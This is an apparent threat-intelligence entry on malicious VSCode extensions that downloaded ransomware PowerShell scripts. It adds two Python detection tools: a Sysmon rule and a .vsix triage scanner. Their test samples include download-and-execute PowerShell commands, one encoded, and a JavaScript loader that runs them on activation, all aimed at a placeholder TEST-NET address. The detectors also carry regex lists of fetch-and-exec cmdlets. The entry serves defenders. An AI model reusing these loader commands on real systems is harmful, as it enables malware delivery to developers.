Full Report
Two malicious VSCode Marketplace extensions were found deploying in-development ransomware from a remote server, exposing critical gaps in Microsoft's review process. [...]
Analysis Summary
# Tool/Technique: Malicious VSCode Extensions (ahban.cychelloworld)
## Overview
This entry describes a threat involving malicious extensions submitted to the Visual Studio Code (VSCode) Marketplace that downloaded and executed early-stage ransomware payloads on victim machines. The initial malicious version of one extension was accepted and remained active for several months, indicating a flaw in the marketplace's review process.
## Technical Details
- Type: Malware Delivery Mechanism (via legitimate platform distribution)
- Platform: VSCode (Visual Studio Code) on developer workstations. VSCode itself runs on Windows, macOS, and Linux, but the payload is delivered as PowerShell, so Windows hosts are the practical target (PowerShell 7 exists for macOS and Linux but is not installed by default there).
- Capabilities: Downloading and executing remote PowerShell scripts containing ransomware artifacts.
- First Seen: The malicious version (0.0.2) of `ahban.cychelloworld` was accepted on the VSCode Marketplace on November 24, 2024.
## MITRE ATT&CK Mapping
*Note: Since the primary focus is delivery and initial execution via a remote script download, the mappings below reflect that execution chain. Drive-by Compromise (T1189) does not fit: the victim installs the extension rather than visiting a compromised site. T1189 and T1105 have no sub-techniques, so the sub-technique IDs sometimes attached to them are not valid ATT&CK identifiers.*
- T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools (malicious extension published through the official marketplace)
- T1204.002 - User Execution: Malicious File (the developer installs the extension)
- T1176.002 - Software Extensions: IDE Extensions (ATT&CK v17 and later; the installed extension is also what keeps the loader on the machine)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1105 - Ingress Tool Transfer (the extension downloads the script from a remote server)
## Functionality
### Core Capabilities
- **Initial Distribution:** Malicious code shipped inside a seemingly legitimate extension published on the official VSCode Marketplace.
- **Payload Fetching:** Upon installation or execution, the extension downloaded and executed remote PowerShell scripts.
### Advanced Features
- **Evasion:** The extensions reportedly remained listed and undetected for almost four months. Because the extension itself only fetches and runs a remote script, the marketplace review saw a small loader rather than the ransomware, and the server-side script could be changed at any time without resubmitting the extension. Once installed, the extension also stays on the developer's machine until it is removed.
- **Ransomware Staging:** The delivery mechanism was explicitly designed to fetch "early-stage ransomware."
## Indicators of Compromise
- **File Hashes:** (Not provided in the context)
- **Extension Identifiers:** `ahban.cychelloworld` (publisher.name form used by the Marketplace), version 0.0.2 onward; a second extension is mentioned but not detailed in the context.
- **Registry Keys:** (Not provided in the context)
- **Network Indicators:** The extension connects to an external server to download the PowerShell scripts. Specific hosts and URLs are not provided in the context; whether the server is also used for ongoing C2 is not stated.
- **Behavioral Indicators:**
- Installation or activation of untrusted VSCode extensions, especially ones that activate on every editor start.
- `powershell.exe` or `pwsh.exe` spawned with `Code.exe` as the parent process, with a command line that downloads and runs remote content (`Invoke-WebRequest`, `DownloadString`, `Invoke-Expression`, or an `-EncodedCommand` blob).
## Associated Threat Actors
- The context does not name a specific threat actor group, only referencing the malicious nature of the extensions.
## Detection Methods
- **Signature-based detection:** Ineffective initially; the extension contains no ransomware, only a loader, so there was nothing for marketplace review or endpoint signatures to match, and the remote script can change without a new extension version.
- **Behavioral detection:** Essential for catching the execution of remote PowerShell scripts initiated by development tools or extensions.
- **YARA rules:** (Not provided in the context)
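The behavioural indicator above (PowerShell launched by `Code.exe` to fetch and run remote content) can be expressed as a process-creation rule. The block below is an added example written for this entry, not code from the report or from ExtensionTotal. It runs over a constructed list of Sysmon-style EventID 1 records; the command lines and the 203.0.113.10 address (a TEST-NET range) are made up for illustration and do not reproduce the real scripts or server. It also decodes `-EncodedCommand` payloads, since that is the cheapest way for a loader to hide `Invoke-Expression` from a plain string match.

```python
"""Behavioural detection: PowerShell spawned by VS Code that pulls remote scripts.

Added illustration; not code from the report or from ExtensionTotal.
Input is a constructed list of Sysmon-style process-creation events
(EventID 1 fields). In practice these come from an EDR or SIEM.
"""
import base64
import re

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
VSCODE_IMAGES = {"code.exe", "code - insiders.exe"}
# Cmdlets and aliases that fetch or run remote content (case-insensitive)
REMOTE_FETCH = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|invoke-expression|\biex\b|\bcurl\b|\bwget\b",
    re.I,
)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(script: str) -> str:
    """Encode the way -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict):
    """Return an alert dict for a suspicious VS Code -> PowerShell launch, else None."""
    if ev.get("EventID") != 1:
        return None
    if _basename(ev.get("ParentImage", "")) not in VSCODE_IMAGES:
        return None
    if _basename(ev.get("Image", "")) not in PS_IMAGES:
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    effective = decoded if decoded is not None else cmd
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    hit = REMOTE_FETCH.search(effective)
    if hit:
        reasons.append("remote fetch/exec: " + hit.group(0))
    if re.search(r"-(?:ex(?:ec(?:utionpolicy)?)?|ep)\s+bypass", cmd, re.I):
        reasons.append("execution policy bypass")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    if not reasons:
        return None  # VS Code tasks legitimately run PowerShell; plain commands stay quiet
    return {"severity": "high" if hit else "medium", "reasons": reasons, "command": effective}


def find_alerts(events):
    return [a for a in (analyze_event(e) for e in events) if a]


# Constructed sample telemetry (paths are typical install locations)
VSCODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
PS51 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS7 = r"C:\Program Files\PowerShell\7\pwsh.exe"

SAMPLE_EVENTS = [
    # 1: plaintext download-and-run, the shape described in the report
    {"EventID": 1, "ParentImage": VSCODE, "Image": PS51,
     "CommandLine": 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command '
                    '"iex (iwr -UseBasicParsing http://203.0.113.10/stage.ps1)"'},
    # 2: the same behaviour hidden behind -EncodedCommand and a hidden window
    {"EventID": 1, "ParentImage": VSCODE, "Image": PS7,
     "CommandLine": "pwsh.exe -NoP -W Hidden -EncodedCommand " + encode_ps(
         "(New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1') | iex")},
    # 3: a build task running PowerShell from VS Code: benign, must not alert
    {"EventID": 1, "ParentImage": VSCODE, "Image": PS51,
     "CommandLine": 'powershell.exe -NoProfile -Command "dotnet build"'},
    # 4: PowerShell from Explorer: outside this rule's scope (other rules cover it)
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS51,
     "CommandLine": 'powershell.exe -Command "iex (iwr http://203.0.113.10/x.ps1)"'},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert["severity"], alert["reasons"], alert["command"])
```

The parent-process check is what makes this rule useful: PowerShell with a download cmdlet is common on developer machines, but PowerShell whose parent is the editor and which immediately reaches out to the network is rare outside of a loader. Scoping by parent keeps the rule quiet for build tasks (event 3) while still catching the encoded variant (event 2).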
## Mitigation Strategies
- **Prevention Measures:**
- Organizations should vet and restrict developer use of untrusted third-party marketplace extensions.
- Scan extensions before they are installed and keep scanning them after, since a later version can introduce the malicious behaviour (the report cites ExtensionTotal's scanner as an example of such tooling).
- **Hardening Recommendations:**
- Apply strict application control policies to limit script execution, particularly PowerShell, when it is launched from unexpected parent processes such as IDEs and other developer tools.
- Review the security practices and review speeds of software distribution platforms (like the VSCode Marketplace).
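Vetting an extension before it is allowed onto developer machines comes down to reading its manifest and shipped JavaScript for the combination seen here: activate on every editor start, spawn a shell, reach out to the network. The block below is an added example for this entry, not code from the report, from ExtensionTotal, or from Microsoft. It reads a `.vsix` (a zip archive whose files live under `extension/`) and flags that combination. Both sample archives are constructed in memory; the "malicious" one mirrors the behaviour described above using a TEST-NET address and does not reproduce the real extension's code or server.

```python
"""Static triage of a .vsix before it is approved for install.

Added illustration; not code from the report, from ExtensionTotal or from
Microsoft. A .vsix is a zip archive; the extension's files sit under
extension/ and extension/package.json is its manifest.
"""
import io
import json
import re
import zipfile

# Source patterns a reviewer should want explained before approving an extension
RISKY_JS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]"""),
    "process_spawn": re.compile(r"\b(?:exec|execSync|spawn|spawnSync|execFile)\s*\("),
    "powershell": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "remote_url": re.compile(r"""https?://[^\s'"`)]+""", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "base64_blob": re.compile(r"""Buffer\.from\([^)]*['"]base64['"]\)"""),
}
AUTO_ACTIVATE = {"*", "onStartupFinished"}


def triage_vsix(vsix_bytes: bytes) -> dict:
    """Return {'extension', 'verdict', 'findings'}; verdict is pass, review or block."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        names = zf.namelist()
        if "extension/package.json" not in names:
            return {"extension": "?", "verdict": "block", "findings": [("manifest", "missing")]}
        manifest = json.loads(zf.read("extension/package.json"))
        ident = f'{manifest.get("publisher", "?")}.{manifest.get("name", "?")}'
        auto = set(manifest.get("activationEvents", [])) & AUTO_ACTIVATE
        if auto:
            findings.append(("activation", "runs on every VS Code start: " + ", ".join(sorted(auto))))
        # Scan every script shipped in the package, not only the declared entry point
        for name in names:
            if not name.startswith("extension/") or not name.endswith((".js", ".cjs", ".mjs", ".ts")):
                continue
            src = zf.read(name).decode("utf-8", errors="replace")
            for label, rx in RISKY_JS.items():
                for m in rx.finditer(src):
                    findings.append((label, f"{name}: {m.group(0)[:80]}"))
    # The co-occurrence is what matters: auto-activation plus a shell plus a remote fetch
    labels = {label for label, _ in findings}
    if {"activation", "process_spawn"} <= labels and labels & {"remote_url", "powershell"}:
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "pass"
    return {"extension": ident, "verdict": verdict, "findings": findings}


def build_sample_vsix(malicious: bool) -> bytes:
    """Constructed sample archives. The malicious one mirrors the reported
    behaviour (activate on start, spawn PowerShell, fetch a remote script)
    without reproducing any real code; 203.0.113.10 is a TEST-NET address."""
    manifest = {
        "name": "sample-ext", "publisher": "sample", "version": "0.0.1",
        "main": "./extension.js",
        "activationEvents": ["*"] if malicious else ["onCommand:sample.hello"],
        "contributes": {"commands": [{"command": "sample.hello", "title": "Hello"}]},
    }
    if malicious:
        js = (
            "const { exec } = require('child_process');\n"
            "function activate() {\n"
            "  exec('powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "
            "\"iex (iwr http://203.0.113.10/stage.ps1)\"');\n"
            "}\nmodule.exports = { activate };\n"
        )
    else:
        js = (
            "const vscode = require('vscode');\n"
            "function activate(ctx) {\n"
            "  ctx.subscriptions.push(vscode.commands.registerCommand("
            "'sample.hello', () => vscode.window.showInformationMessage('Hello')));\n"
            "}\nmodule.exports = { activate };\n"
        )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json", json.dumps(manifest))
        zf.writestr("extension/extension.js", js)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print(json.dumps(triage_vsix(build_sample_vsix(flag)), indent=2))
```

The point of the verdict logic is that none of the individual patterns is damning on its own: plenty of legitimate extensions spawn processes or contact a URL. What should stop an approval is the combination, and a loader that only fetches a script will still show the spawn-plus-URL pair even though the ransomware itself is nowhere in the package. This is also why a single pre-install scan is not enough; the same check has to run on every new version.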
## Related Tools/Techniques
- Malicious extensions across other IDEs/Editors (e.g., extensions used for phishing or credential theft).
- Supply chain compromise techniques leveraging trusted vendor platforms for malware distribution.